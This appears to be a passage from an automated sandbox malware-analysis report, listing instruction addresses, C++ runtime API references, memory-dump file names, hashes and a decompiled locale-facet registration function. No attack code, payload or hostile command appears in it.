0x6d49bca6
0x6d49bca9
0x6d49bcb5
0x6d49bc2d
0x6d49bc2d
0x6d49bc30
0x6d49bc34
0x6d49bc38
0x6d49bc45
0x6d49bc4d
0x6d49bc4f
0x00000000
0x6d49bc4f
0x6d49bc16
0x6d49bc16
0x00000000
0x6d49bc16
0x6d49bc14
0x6d49bb87
0x6d49bb87
0x6d49bb8a
0x6d49bb8e
0x6d49bb92
0x6d49bb9f
0x6d49bba7
0x6d49bba9
0x00000000
0x6d49bba9
0x6d49bb70
0x6d49bb70
0x00000000
0x6d49bb70
0x6d49bb6e
0x6d49bae1
0x6d49bae1
0x6d49bae4
0x6d49bae8
0x6d49baec
0x6d49baf9
0x6d49bb01
0x6d49bb03
0x00000000
0x6d49bb03
0x6d49baca
0x6d49baca
0x00000000
0x6d49baca
0x6d49bac8

APIs

__EH_prolog3.LIBCMT ref: 6D49BA91
std::_Lockit::_Lockit.LIBCPMT ref: 6D49BA9B
int.LIBCPMT ref: 6D49BAB2

Part of subcall function 6D46161C: std::_Lockit::_Lockit.LIBCPMT ref: 6D46162D
Part of subcall function 6D46161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6D461647

moneypunct.LIBCPMT ref: 6D49BAD5
std::_Facet_Register.LIBCPMT ref: 6D49BAEC
std::_Lockit::~_Lockit.LIBCPMT ref: 6D49BB0C
__CxxThrowException@8.LIBVCRUNTIME ref: 6D49BB2A

Memory Dump Source

Source File: 00000000.00000002.917299629.000000006D461000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: true

Associated: 00000000.00000002.917294141.000000006D460000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.917348475.000000006D4EA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.925206892.000000006D545000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.927426246.000000006D55C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.928422377.000000006D55D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowmoneypunct
String ID:
API String ID: 113178234-0
Opcode ID: ae8532c3cbfeadc7c4e962046d372e82db99c56689b563ae6b985ee54400e7c0
Instruction ID: da505fb6a189cd5ecf423827a07e5cf018226729c84658d822919194077d4ccb
Opcode Fuzzy Hash: ae8532c3cbfeadc7c4e962046d372e82db99c56689b563ae6b985ee54400e7c0
Instruction Fuzzy Hash: 2611E3768081159BCF01EBA4C884EFEBBB4AF90314F2A400CD611AB394DB709D01C7E1

Uniqueness

Uniqueness Score: -1.00%

Function 6D48F567, Relevance: 10.6, APIs: 7, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E6D48F567(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t181;
				signed int _t182;
				void* _t194;
				void* _t207;
				void* _t220;
				void* _t233;
				void* _t246;
				void* _t259;
				void* _t272;
				void* _t285;
				void* _t298;
				void* _t311;
				void* _t324;
				signed int _t473;
				signed int _t513;
				signed int _t514;
				signed int _t515;
				signed int _t516;
				signed int _t517;
				signed int _t518;
				signed int _t519;
				signed int _t520;
				signed int _t521;
				signed int _t522;
				signed int _t523;
				signed int _t525;
				signed int _t526;
				signed int _t527;
				signed int _t528;
				signed int _t529;
				signed int _t530;
				signed int _t531;
				signed int _t532;
				signed int _t533;
				signed int _t534;
				signed int _t535;
				signed int _t536;
				signed int _t537;
				void* _t550;

				_t510 = __edx;
				_t389 = __ebx;
				E6D4A00AC(0x6d4e83cf, __ebx, __edi, __esi, 0x14);
				E6D486653(_t550 - 0x14, 0);
				_t525 =  *0x6d546df8; // 0x0
				 *(_t550 - 4) =  *(_t550 - 4) & 0x00000000;
				 *(_t550 - 0x10) = _t525;
				_t181 = E6D46161C(0x6d546da4);
				_t392 =  *((intOrPtr*)(_t550 + 8));
				_t182 = E6D46171B( *((intOrPtr*)(_t550 + 8)), _t181);
				_t512 = _t182;
				if(_t182 != 0) {
					L5:
					E6D4866BA(_t550 - 0x14);
					return E6D4A0075(_t512);
				} else {
					if(_t525 == 0) {
						_push( *((intOrPtr*)(_t550 + 8)));
						_push(_t550 - 0x10);
						__eflags = E6D491127(__ebx, _t392, __edx, _t512, _t525) - 0xffffffff;
						if(__eflags == 0) {
							E6D461438(_t550 - 0x20);
							E6D4A3D74(_t550 - 0x20, 0x6d543504);
							asm("int3");
							E6D4A00AC(0x6d4e83cf, __ebx, _t512, _t525, 0x14);
							E6D486653(_t550 - 0x14, 0);
							_t526 =  *0x6d546df4; // 0x0
							 *(_t550 - 4) =  *(_t550 - 4) & 0x00000000;
							 *(_t550 - 0x10) = _t526;
							_t194 = E6D46161C(0x6d546da0);
							_t399 =  *((intOrPtr*)(_t550 + 8));
							_t513 = E6D46171B( *((intOrPtr*)(_t550 + 8)), _t194);
							__eflags = _t513;
							if(_t513 != 0) {
								L12:
								E6D4866BA(_t550 - 0x14);
								return E6D4A0075(_t513);
							} else {
								__eflags = _t526;
								if(_t526 == 0) {
									_push( *((intOrPtr*)(_t550 + 8)));
									_push(_t550 - 0x10);
									__eflags = E6D4911AB(_t389, _t399, __edx, _t513, _t526) - 0xffffffff;
									if(__eflags == 0) {
										E6D461438(_t550 - 0x20);
										E6D4A3D74(_t550 - 0x20, 0x6d543504);
										asm("int3");
										E6D4A00AC(0x6d4e83cf, _t389, _t513, _t526, 0x14);
										E6D486653(_t550 - 0x14, 0);
										_t527 =  *0x6d546dc8; // 0x0
										 *(_t550 - 4) =  *(_t550 - 4) & 0x00000000;
										 *(_t550 - 0x10) = _t527;
										_t207 = E6D46161C(0x6d546d7c);
										_t406 =  *((intOrPtr*)(_t550 + 8));
										_t514 = E6D46171B( *((intOrPtr*)(_t550 + 8)), _t207);
										__eflags = _t514;
										if(_t514 != 0) {
											L19:
											E6D4866BA(_t550 - 0x14);
											return E6D4A0075(_t514);
										} else {
											__eflags = _t527;
											if(_t527 == 0) {
												_push( *((intOrPtr*)(_t550 + 8)));
												_push(_t550 - 0x10);
												__eflags = E6D491230(_t389, _t406, __edx, _t514, _t527) - 0xffffffff;
												if(__eflags == 0) {
													E6D461438(_t550 - 0x20);
													E6D4A3D74(_t550 - 0x20, 0x6d543504);
													asm("int3");
													E6D4A00AC(0x6d4e83cf, _t389, _t514, _t527, 0x14);
													E6D486653(_t550 - 0x14, 0);
													_t528 =  *0x6d546dc4; // 0x0
													 *(_t550 - 4) =  *(_t550 - 4) & 0x00000000;
													 *(_t550 - 0x10) = _t528;
													_t220 = E6D46161C(0x6d546d78);
													_t413 =  *((intOrPtr*)(_t550 + 8));
													_t515 = E6D46171B( *((intOrPtr*)(_t550 + 8)), _t220);
													__eflags = _t515;
													if(_t515 != 0) {
														L26:
														E6D4866BA(_t550 - 0x14);
														return E6D4A0075(_t515);
													} else {
														__eflags = _t528;
														if(_t528 == 0) {
															_push( *((intOrPtr*)(_t550 + 8)));
															_push(_t550 - 0x10);
															__eflags = E6D4912B4(_t389, _t413, _t510, _t515, _t528) - 0xffffffff;
															if(__eflags == 0) {
																E6D461438(_t550 - 0x20);
																E6D4A3D74(_t550 - 0x20, 0x6d543504);
																asm("int3");
																E6D4A00AC(0x6d4e83cf, _t389, _t515, _t528, 0x14);
																E6D486653(_t550 - 0x14, 0);
																_t529 =  *0x6d546dd8; // 0x0
																 *(_t550 - 4) =  *(_t550 - 4) & 0x00000000;
																 *(_t550 - 0x10) = _t529;
																_t233 = E6D46161C(0x6d546d84);
																_t420 =  *((intOrPtr*)(_t550 + 8));
																_t516 = E6D46171B( *((intOrPtr*)(_t550 + 8)), _t233);
																__eflags = _t516;
																if(_t516 != 0) {
																	L33:
																	E6D4866BA(_t550 - 0x14);
																	return E6D4A0075(_t516);
																} else {
																	__eflags = _t529;
																	if(_t529 == 0) {
																		_push( *((intOrPtr*)(_t550 + 8)));
																		_push(_t550 - 0x10);
																		__eflags = E6D491339(_t389, _t420, _t510, _t516, _t529) - 0xffffffff;
																		if(__eflags == 0) {
																			E6D461438(_t550 - 0x20);
																			E6D4A3D74(_t550 - 0x20, 0x6d543504);
																			asm("int3");
																			E6D4A00AC(0x6d4e83cf, _t389, _t516, _t529, 0x14);
																			E6D486653(_t550 - 0x14, 0);
																			_t530 =  *0x6d546db0; // 0x0
																			 *(_t550 - 4) =  *(_t550 - 4) & 0x00000000;
																			 *(_t550 - 0x10) = _t530;
																			_t246 = E6D46161C(0x6d546d64);
																			_t427 =  *((intOrPtr*)(_t550 + 8));
																			_t517 = E6D46171B( *((intOrPtr*)(_t550 + 8)), _t246);
																			__eflags = _t517;
																			if(_t517 != 0) {
																				L40:
																				E6D4866BA(_t550 - 0x14);
																				return E6D4A0075(_t517);
																			} else {
																				__eflags = _t530;
																				if(_t530 == 0) {
																					_push( *((intOrPtr*)(_t550 + 8)));
																					_push(_t550 - 0x10);
																					__eflags = E6D4913A1(_t389, _t427, _t510, _t517, _t530) - 0xffffffff;
																					if(__eflags == 0) {
																						E6D461438(_t550 - 0x20);
																						E6D4A3D74(_t550 - 0x20, 0x6d543504);
																						asm("int3");
																						E6D4A00AC(0x6d4e83cf, _t389, _t517, _t530, 0x14);
																						E6D486653(_t550 - 0x14, 0);
																						_t531 =  *0x6d546ddc; // 0x0
																						 *(_t550 - 4) =  *(_t550 - 4) & 0x00000000;
																						 *(_t550 - 0x10) = _t531;
																						_t259 = E6D46161C(0x6d546d88);
																						_t434 =  *((intOrPtr*)(_t550 + 8));
																						_t518 = E6D46171B( *((intOrPtr*)(_t550 + 8)), _t259);
																						__eflags = _t518;
																						if(_t518 != 0) {
																							L47:
																							E6D4866BA(_t550 - 0x14);
																							return E6D4A0075(_t518);
																						} else {
																							__eflags = _t531;
																							if(_t531 == 0) {
																								_push( *((intOrPtr*)(_t550 + 8)));
																								_push(_t550 - 0x10);
																								__eflags = E6D491409(_t389, _t434, _t510, _t518, _t531) - 0xffffffff;
																								if(__eflags == 0) {
																									E6D461438(_t550 - 0x20);
																									E6D4A3D74(_t550 - 0x20, 0x6d543504);
																									asm("int3");
																									E6D4A00AC(0x6d4e83cf, _t389, _t518, _t531, 0x14);
																									E6D486653(_t550 - 0x14, 0);
																									_t532 =  *0x6d546de0; // 0x0
																									 *(_t550 - 4) =  *(_t550 - 4) & 0x00000000;
																									 *(_t550 - 0x10) = _t532;
																									_t272 = E6D46161C(0x6d546d8c);
																									_t441 =  *((intOrPtr*)(_t550 + 8));
																									_t519 = E6D46171B( *((intOrPtr*)(_t550 + 8)), _t272);
																									__eflags = _t519;
																									if(_t519 != 0) {
																										L54:
																										E6D4866BA(_t550 - 0x14);
																										return E6D4A0075(_t519);
																									} else {
																										__eflags = _t532;
																										if(_t532 == 0) {
																											_push( *((intOrPtr*)(_t550 + 8)));
																											_push(_t550 - 0x10);
																											__eflags = E6D491471(_t389, _t441, _t510, _t519, _t532) - 0xffffffff;
																											if(__eflags == 0) {
																												E6D461438(_t550 - 0x20);
																												E6D4A3D74(_t550 - 0x20, 0x6d543504);
																												asm("int3");
																												E6D4A00AC(0x6d4e83cf, _t389, _t519, _t532, 0x14);
																												E6D486653(_t550 - 0x14, 0);
																												_t533 =  *0x6d546dfc; // 0x0
																												 *(_t550 - 4) =  *(_t550 - 4) & 0x00000000;
																												 *(_t550 - 0x10) = _t533;
																												_t285 = E6D46161C(0x6d546da8);
																												_t448 =  *((intOrPtr*)(_t550 + 8));
																												_t520 = E6D46171B( *((intOrPtr*)(_t550 + 8)), _t285);
																												__eflags = _t520;
																												if(_t520 != 0) {
																													L61:
																													E6D4866BA(_t550 - 0x14);
																													return E6D4A0075(_t520);
																												} else {
																													__eflags = _t533;
																													if(_t533 == 0) {
																														_push( *((intOrPtr*)(_t550 + 8)));
																														_push(_t550 - 0x10);
																														__eflags = E6D4914EC(_t389, _t448, _t510, _t520, _t533) - 0xffffffff;
																														if(__eflags == 0) {
																															E6D461438(_t550 - 0x20);
																															E6D4A3D74(_t550 - 0x20, 0x6d543504);
																															asm("int3");
																															E6D4A00AC(0x6d4e83cf, _t389, _t520, _t533, 0x14);
																															E6D486653(_t550 - 0x14, 0);
																															_t534 =  *0x6d546dcc; // 0x0
																															 *(_t550 - 4) =  *(_t550 - 4) & 0x00000000;
																															 *(_t550 - 0x10) = _t534;
																															_t298 = E6D46161C(0x6d546d80);
																															_t455 =  *((intOrPtr*)(_t550 + 8));
																															_t521 = E6D46171B( *((intOrPtr*)(_t550 + 8)), _t298);
																															__eflags = _t521;
																															if(_t521 != 0) {
																																L68:
																																E6D4866BA(_t550 - 0x14);
																																return E6D4A0075(_t521);
																															} else {
																																__eflags = _t534;
																																if(_t534 == 0) {
																																	_push( *((intOrPtr*)(_t550 + 8)));
																																	_push(_t550 - 0x10);
																																	__eflags = E6D491558(_t389, _t455, _t510, _t521, _t534) - 0xffffffff;
																																	if(__eflags == 0) {
																																		E6D461438(_t550 - 0x20);
																																		E6D4A3D74(_t550 - 0x20, 0x6d543504);
																																		asm("int3");
																																		E6D4A00AC(0x6d4e83cf, _t389, _t521, _t534, 0x14);
																																		E6D486653(_t550 - 0x14, 0);
																																		_t535 =  *0x6d546e00; // 0x0
																																		 *(_t550 - 4) =  *(_t550 - 4) & 0x00000000;
																																		 *(_t550 - 0x10) = _t535;
																																		_t311 = E6D46161C(0x6d546dac);
																																		_t462 =  *((intOrPtr*)(_t550 + 8));
																																		_t522 = E6D46171B( *((intOrPtr*)(_t550 + 8)), _t311);
																																		__eflags = _t522;
																																		if(_t522 != 0) {
																																			L75:
																																			E6D4866BA(_t550 - 0x14);
																																			return E6D4A0075(_t522);
																																		} else {
																																			__eflags = _t535;
																																			if(_t535 == 0) {
																																				_push( *((intOrPtr*)(_t550 + 8)));
																																				_push(_t550 - 0x10);
																																				__eflags = E6D4915C4(_t389, _t462, _t510, _t522, _t535) - 0xffffffff;
																																				if(__eflags == 0) {
																																					E6D461438(_t550 - 0x20);
																																					E6D4A3D74(_t550 - 0x20, 0x6d543504);
																																					asm("int3");
																																					E6D4A00AC(0x6d4e83cf, _t389, _t522, _t535, 0x14);
																																					E6D486653(_t550 - 0x14, 0);
																																					_t536 =  *0x6d546dd0; // 0x0
																																					 *(_t550 - 4) =  *(_t550 - 4) & 0x00000000;
																																					 *(_t550 - 0x10) = _t536;
																																					_t324 = E6D46161C(0x6d546d60);
																																					_t469 =  *((intOrPtr*)(_t550 + 8));
																																					_t523 = E6D46171B( *((intOrPtr*)(_t550 + 8)), _t324);
																																					__eflags = _t523;
																																					if(_t523 != 0) {
																																						L82:
																																						E6D4866BA(_t550 - 0x14);
																																						return E6D4A0075(_t523);
																																					} else {
																																						__eflags = _t536;
																																						if(_t536 == 0) {
																																							_push( *((intOrPtr*)(_t550 + 8)));
																																							_push(_t550 - 0x10);
																																							__eflags = E6D49162A(_t389, _t469, _t510, _t523, _t536) - 0xffffffff;
																																							if(__eflags == 0) {
																																								_t473 = _t550 - 0x20;
																																								E6D461438(_t473);
																																								E6D4A3D74(_t550 - 0x20, 0x6d543504);
																																								asm("int3");
																																								E6D4A00AC(0x6d4e851f, _t389, _t523, _t536, 4);
																																								_t537 = _t473;
																																								 *(_t550 - 0x10) = _t537;
																																								 *((intOrPtr*)(_t537 + 4)) =  *((intOrPtr*)(_t550 + 0xc));
																																								_push( *((intOrPtr*)(_t550 + 0x14)));
																																								_t175 = _t550 - 4;
																																								 *_t175 =  *(_t550 - 4) & 0x00000000;
																																								__eflags =  *_t175;
																																								 *_t537 = 0x6d4ec0c4;
																																								 *((char*)(_t537 + 0x28)) =  *((intOrPtr*)(_t550 + 0x10));
																																								E6D49542F(_t389, _t473, _t510, _t523, _t537,  *_t175);
																																								return E6D4A0075(_t537,  *((intOrPtr*)(_t550 + 8)));
																																							} else {
																																								_t523 =  *(_t550 - 0x10);
																																								 *(_t550 - 0x10) = _t523;
																																								 *(_t550 - 4) = 1;
																																								E6D486FD3(__eflags, _t523);
																																								 *0x6d4ea26c();
																																								 *((intOrPtr*)( *((intOrPtr*)( *_t523 + 4))))();
																																								 *0x6d546dd0 = _t523;
																																								goto L82;
																																							}
																																						} else {
																																							_t523 = _t536;
																																							goto L82;
																																						}
																																					}
																																				} else {
																																					_t522 =  *(_t550 - 0x10);
																																					 *(_t550 - 0x10) = _t522;
																																					 *(_t550 - 4) = 1;
																																					E6D486FD3(__eflags, _t522);
																																					 *0x6d4ea26c();
																																					 *((intOrPtr*)( *((intOrPtr*)( *_t522 + 4))))();
																																					 *0x6d546e00 = _t522;
																																					goto L75;
																																				}
																																			} else {
																																				_t522 = _t535;
																																				goto L75;
																																			}
																																		}
																																	} else {
																																		_t521 =  *(_t550 - 0x10);
																																		 *(_t550 - 0x10) = _t521;
																																		 *(_t550 - 4) = 1;
																																		E6D486FD3(__eflags, _t521);
																																		 *0x6d4ea26c();
																																		 *((intOrPtr*)( *((intOrPtr*)( *_t521 + 4))))();
																																		 *0x6d546dcc = _t521;
																																		goto L68;
																																	}
																																} else {
																																	_t521 = _t534;
																																	goto L68;
																																}
																															}
																														} else {
																															_t520 =  *(_t550 - 0x10);
																															 *(_t550 - 0x10) = _t520;
																															 *(_t550 - 4) = 1;
																															E6D486FD3(__eflags, _t520);
																															 *0x6d4ea26c();
																															 *((intOrPtr*)( *((intOrPtr*)( *_t520 + 4))))();
																															 *0x6d546dfc = _t520;
																															goto L61;
																														}
																													} else {
																														_t520 = _t533;
																														goto L61;
																													}
																												}
																											} else {
																												_t519 =  *(_t550 - 0x10);
																												 *(_t550 - 0x10) = _t519;
																												 *(_t550 - 4) = 1;
																												E6D486FD3(__eflags, _t519);
																												 *0x6d4ea26c();
																												 *((intOrPtr*)( *((intOrPtr*)( *_t519 + 4))))();
																												 *0x6d546de0 = _t519;
																												goto L54;
																											}
																										} else {
																											_t519 = _t532;
																											goto L54;
																										}
																									}
																								} else {
																									_t518 =  *(_t550 - 0x10);
																									 *(_t550 - 0x10) = _t518;
																									 *(_t550 - 4) = 1;
																									E6D486FD3(__eflags, _t518);
																									 *0x6d4ea26c();
																									 *((intOrPtr*)( *((intOrPtr*)( *_t518 + 4))))();
																									 *0x6d546ddc = _t518;
																									goto L47;
																								}
																							} else {
																								_t518 = _t531;
																								goto L47;
																							}
																						}
																					} else {
																						_t517 =  *(_t550 - 0x10);
																						 *(_t550 - 0x10) = _t517;
																						 *(_t550 - 4) = 1;
																						E6D486FD3(__eflags, _t517);
																						 *0x6d4ea26c();
																						 *((intOrPtr*)( *((intOrPtr*)( *_t517 + 4))))();
																						 *0x6d546db0 = _t517;
																						goto L40;
																					}
																				} else {
																					_t517 = _t530;
																					goto L40;
																				}
																			}
																		} else {
																			_t516 =  *(_t550 - 0x10);
																			 *(_t550 - 0x10) = _t516;
																			 *(_t550 - 4) = 1;
																			E6D486FD3(__eflags, _t516);
																			 *0x6d4ea26c();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t516 + 4))))();
																			 *0x6d546dd8 = _t516;
																			goto L33;
																		}
																	} else {
																		_t516 = _t529;
																		goto L33;
																	}
																}
															} else {
																_t515 =  *(_t550 - 0x10);
																 *(_t550 - 0x10) = _t515;
																 *(_t550 - 4) = 1;
																E6D486FD3(__eflags, _t515);
																 *0x6d4ea26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t515 + 4))))();
																 *0x6d546dc4 = _t515;
																goto L26;
															}
														} else {
															_t515 = _t528;
															goto L26;
														}
													}
												} else {
													_t514 =  *(_t550 - 0x10);
													 *(_t550 - 0x10) = _t514;
													 *(_t550 - 4) = 1;
													E6D486FD3(__eflags, _t514);
													 *0x6d4ea26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t514 + 4))))();
													 *0x6d546dc8 = _t514;
													goto L19;
												}
											} else {
												_t514 = _t527;
												goto L19;
											}
										}
									} else {
										_t513 =  *(_t550 - 0x10);
										 *(_t550 - 0x10) = _t513;
										 *(_t550 - 4) = 1;
										E6D486FD3(__eflags, _t513);
										 *0x6d4ea26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t513 + 4))))();
										 *0x6d546df4 = _t513;
										goto L12;
									}
								} else {
									_t513 = _t526;
									goto L12;
								}
							}
						} else {
							_t512 =  *(_t550 - 0x10);
							 *(_t550 - 0x10) = _t512;
							 *(_t550 - 4) = 1;
							E6D486FD3(__eflags, _t512);
							 *0x6d4ea26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t512 + 4))))();
							 *0x6d546df8 = _t512;
							goto L5;
						}
					} else {
						_t512 = _t525;
						goto L5;
					}
				}
			}

0x6d48f567
0x6d48f567
0x6d48f56e
0x6d48f578
0x6d48f57d
0x6d48f588
0x6d48f58c
0x6d48f58f
0x6d48f594
0x6d48f598
0x6d48f59d
0x6d48f5a1
0x6d48f5e6
0x6d48f5e9
0x6d48f5f5
0x6d48f5a3
0x6d48f5a5
0x6d48f5ab
0x6d48f5b1
0x6d48f5b9
0x6d48f5bc
0x6d48f5f9
0x6d48f607
0x6d48f60c
0x6d48f614
0x6d48f61e
0x6d48f623
0x6d48f62e
0x6d48f632
0x6d48f635
0x6d48f63a
0x6d48f643
0x6d48f645
0x6d48f647
0x6d48f68c
0x6d48f68f
0x6d48f69b
0x6d48f649
0x6d48f649
0x6d48f64b
0x6d48f651
0x6d48f657
0x6d48f65f
0x6d48f662
0x6d48f69f
0x6d48f6ad
0x6d48f6b2
0x6d48f6ba
0x6d48f6c4
0x6d48f6c9
0x6d48f6d4
0x6d48f6d8
0x6d48f6db
0x6d48f6e0
0x6d48f6e9
0x6d48f6eb
0x6d48f6ed
0x6d48f732
0x6d48f735
0x6d48f741
0x6d48f6ef
0x6d48f6ef
0x6d48f6f1
0x6d48f6f7
0x6d48f6fd
0x6d48f705
0x6d48f708
0x6d48f745
0x6d48f753
0x6d48f758
0x6d48f760
0x6d48f76a
0x6d48f76f
0x6d48f77a
0x6d48f77e
0x6d48f781
0x6d48f786
0x6d48f78f
0x6d48f791
0x6d48f793
0x6d48f7d8
0x6d48f7db
0x6d48f7e7
0x6d48f795
0x6d48f795
0x6d48f797
0x6d48f79d
0x6d48f7a3
0x6d48f7ab
0x6d48f7ae
0x6d48f7eb
0x6d48f7f9
0x6d48f7fe
0x6d48f806
0x6d48f810
0x6d48f815
0x6d48f820
0x6d48f824
0x6d48f827
0x6d48f82c
0x6d48f835
0x6d48f837
0x6d48f839
0x6d48f87e
0x6d48f881
0x6d48f88d
0x6d48f83b
0x6d48f83b
0x6d48f83d
0x6d48f843
0x6d48f849
0x6d48f851
0x6d48f854
0x6d48f891
0x6d48f89f
0x6d48f8a4
0x6d48f8ac
0x6d48f8b6
0x6d48f8bb
0x6d48f8c6
0x6d48f8ca
0x6d48f8cd
0x6d48f8d2
0x6d48f8db
0x6d48f8dd
0x6d48f8df
0x6d48f924
0x6d48f927
0x6d48f933
0x6d48f8e1
0x6d48f8e1
0x6d48f8e3
0x6d48f8e9
0x6d48f8ef
0x6d48f8f7
0x6d48f8fa
0x6d48f937
0x6d48f945
0x6d48f94a
0x6d48f952
0x6d48f95c
0x6d48f961
0x6d48f96c
0x6d48f970
0x6d48f973
0x6d48f978
0x6d48f981
0x6d48f983
0x6d48f985
0x6d48f9ca
0x6d48f9cd
0x6d48f9d9
0x6d48f987
0x6d48f987
0x6d48f989
0x6d48f98f
0x6d48f995
0x6d48f99d
0x6d48f9a0
0x6d48f9dd
0x6d48f9eb
0x6d48f9f0
0x6d48f9f8
0x6d48fa02
0x6d48fa07
0x6d48fa12
0x6d48fa16
0x6d48fa19
0x6d48fa1e
0x6d48fa27
0x6d48fa29
0x6d48fa2b
0x6d48fa70
0x6d48fa73
0x6d48fa7f
0x6d48fa2d
0x6d48fa2d
0x6d48fa2f
0x6d48fa35
0x6d48fa3b
0x6d48fa43
0x6d48fa46
0x6d48fa83
0x6d48fa91
0x6d48fa96
0x6d48fa9e
0x6d48faa8
0x6d48faad
0x6d48fab8
0x6d48fabc
0x6d48fabf
0x6d48fac4
0x6d48facd
0x6d48facf
0x6d48fad1
0x6d48fb16
0x6d48fb19
0x6d48fb25
0x6d48fad3
0x6d48fad3
0x6d48fad5
0x6d48fadb
0x6d48fae1
0x6d48fae9
0x6d48faec
0x6d48fb29
0x6d48fb37
0x6d48fb3c
0x6d48fb44
0x6d48fb4e
0x6d48fb53
0x6d48fb5e
0x6d48fb62
0x6d48fb65
0x6d48fb6a
0x6d48fb73
0x6d48fb75
0x6d48fb77
0x6d48fbbc
0x6d48fbbf
0x6d48fbcb
0x6d48fb79
0x6d48fb79
0x6d48fb7b
0x6d48fb81
0x6d48fb87
0x6d48fb8f
0x6d48fb92
0x6d48fbcf
0x6d48fbdd
0x6d48fbe2
0x6d48fbea
0x6d48fbf4
0x6d48fbf9
0x6d48fc04
0x6d48fc08
0x6d48fc0b
0x6d48fc10
0x6d48fc19
0x6d48fc1b
0x6d48fc1d
0x6d48fc62
0x6d48fc65
0x6d48fc71
0x6d48fc1f
0x6d48fc1f
0x6d48fc21
0x6d48fc27
0x6d48fc2d
0x6d48fc35
0x6d48fc38
0x6d48fc75
0x6d48fc83
0x6d48fc88
0x6d48fc90
0x6d48fc9a
0x6d48fc9f
0x6d48fcaa
0x6d48fcae
0x6d48fcb1
0x6d48fcb6
0x6d48fcbf
0x6d48fcc1
0x6d48fcc3
0x6d48fd08
0x6d48fd0b
0x6d48fd17
0x6d48fcc5
0x6d48fcc5
0x6d48fcc7
0x6d48fccd
0x6d48fcd3
0x6d48fcdb
0x6d48fcde
0x6d48fd18
0x6d48fd1b
0x6d48fd29
0x6d48fd2e
0x6d48fd36
0x6d48fd3b
0x6d48fd3d
0x6d48fd43
0x6d48fd46
0x6d48fd4f
0x6d48fd4f
0x6d48fd4f
0x6d48fd53
0x6d48fd59
0x6d48fd5c
0x6d48fd68
0x6d48fce0
0x6d48fce0
0x6d48fce3
0x6d48fce7
0x6d48fceb
0x6d48fcf8
0x6d48fd00
0x6d48fd02
0x00000000
0x6d48fd02
0x6d48fcc9
0x6d48fcc9
0x00000000
0x6d48fcc9
0x6d48fcc7
0x6d48fc3a
0x6d48fc3a
0x6d48fc3d
0x6d48fc41
0x6d48fc45
0x6d48fc52
0x6d48fc5a
0x6d48fc5c
0x00000000
0x6d48fc5c
0x6d48fc23
0x6d48fc23
0x00000000
0x6d48fc23
0x6d48fc21
0x6d48fb94
0x6d48fb94
0x6d48fb97
0x6d48fb9b
0x6d48fb9f
0x6d48fbac
0x6d48fbb4
0x6d48fbb6
0x00000000
0x6d48fbb6
0x6d48fb7d
0x6d48fb7d
0x00000000
0x6d48fb7d
0x6d48fb7b
0x6d48faee
0x6d48faee
0x6d48faf1
0x6d48faf5
0x6d48faf9
0x6d48fb06
0x6d48fb0e
0x6d48fb10
0x00000000
0x6d48fb10
0x6d48fad7
0x6d48fad7
0x00000000
0x6d48fad7
0x6d48fad5
0x6d48fa48
0x6d48fa48
0x6d48fa4b
0x6d48fa4f
0x6d48fa53
0x6d48fa60
0x6d48fa68
0x6d48fa6a
0x00000000
0x6d48fa6a
0x6d48fa31
0x6d48fa31
0x00000000
0x6d48fa31
0x6d48fa2f
0x6d48f9a2
0x6d48f9a2
0x6d48f9a5
0x6d48f9a9
0x6d48f9ad
0x6d48f9ba
0x6d48f9c2
0x6d48f9c4
0x00000000
0x6d48f9c4
0x6d48f98b
0x6d48f98b
0x00000000
0x6d48f98b
0x6d48f989
0x6d48f8fc
0x6d48f8fc
0x6d48f8ff
0x6d48f903
0x6d48f907
0x6d48f914
0x6d48f91c
0x6d48f91e
0x00000000
0x6d48f91e
0x6d48f8e5
0x6d48f8e5
0x00000000
0x6d48f8e5
0x6d48f8e3
0x6d48f856
0x6d48f856
0x6d48f859
0x6d48f85d
0x6d48f861
0x6d48f86e
0x6d48f876
0x6d48f878
0x00000000
0x6d48f878
0x6d48f83f
0x6d48f83f
0x00000000
0x6d48f83f
0x6d48f83d
0x6d48f7b0
0x6d48f7b0
0x6d48f7b3
0x6d48f7b7
0x6d48f7bb
0x6d48f7c8
0x6d48f7d0
0x6d48f7d2
0x00000000
0x6d48f7d2
0x6d48f799
0x6d48f799
0x00000000
0x6d48f799
0x6d48f797
0x6d48f70a
0x6d48f70a
0x6d48f70d
0x6d48f711
0x6d48f715
0x6d48f722
0x6d48f72a
0x6d48f72c
0x00000000
0x6d48f72c
0x6d48f6f3
0x6d48f6f3
0x00000000
0x6d48f6f3
0x6d48f6f1
0x6d48f664
0x6d48f664
0x6d48f667
0x6d48f66b
0x6d48f66f
0x6d48f67c
0x6d48f684
0x6d48f686
0x00000000
0x6d48f686
0x6d48f64d
0x6d48f64d
0x00000000
0x6d48f64d
0x6d48f64b
0x6d48f5be
0x6d48f5be
0x6d48f5c1
0x6d48f5c5
0x6d48f5c9
0x6d48f5d6
0x6d48f5de
0x6d48f5e0
0x00000000
0x6d48f5e0
0x6d48f5a7
0x6d48f5a7
0x00000000
0x6d48f5a7
0x6d48f5a5

APIs

__EH_prolog3.LIBCMT ref: 6D48F56E
std::_Lockit::_Lockit.LIBCPMT ref: 6D48F578
int.LIBCPMT ref: 6D48F58F

Part of subcall function 6D46161C: std::_Lockit::_Lockit.LIBCPMT ref: 6D46162D
Part of subcall function 6D46161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6D461647

moneypunct.LIBCPMT ref: 6D48F5B2
std::_Facet_Register.LIBCPMT ref: 6D48F5C9
std::_Lockit::~_Lockit.LIBCPMT ref: 6D48F5E9
__CxxThrowException@8.LIBVCRUNTIME ref: 6D48F607

Memory Dump Source

Source File: 00000000.00000002.917299629.000000006D461000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: true

Associated: 00000000.00000002.917294141.000000006D460000.00000002.00020000.sdmp Download File
